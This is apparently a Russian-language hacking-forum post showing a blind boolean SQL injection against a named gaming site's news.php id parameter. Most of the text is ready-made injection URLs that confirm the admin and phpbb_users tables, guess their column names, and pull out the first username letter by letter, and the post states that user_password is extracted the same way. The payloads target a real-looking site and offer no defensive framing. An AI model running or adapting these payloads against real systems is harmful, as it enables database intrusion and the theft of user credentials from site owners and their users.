не могу не согласиться, туплю чото сегодня по черному. +

проверка:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+i d+from+admin),1,1)))=49

найденная таблица (и уже случайно колонка):

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+i d+from+phpbb_users),1,1)))=49

брут колонок из phpbb_users :

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u ser+from+phpbb_users),1,1)))=49

сбрутилась еще одна:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users),1,1)))=49

ну в общем стандартные колонки из форума phpbb, значит есть поле и user_password:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u ser_password+from+phpbb_users),1,1)))=49

Далее понятно

но все таки напишу:

ищем ник 1 пользователя в базе:

проверяем на 1-ую буковку 'a':

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users+limit+0,1),1,1)))=97

угадали, отлично, проверяем вторую букву далее по алфавиту:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users+limit+0,1),2,1)))=98

не подходит, и так дошлепали до 110, буква 'n':

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users+limit+0,1),2,1)))=110

на всякий случай проверяем нашу догадку:

http://www.check6gaming.com/news.php?id=67+AND+substring((select+username+from +phpbb_users+limit+0,1),1,2)='an'

значит всё верно. И так бомбим до победного конца. Тоже самое с user_password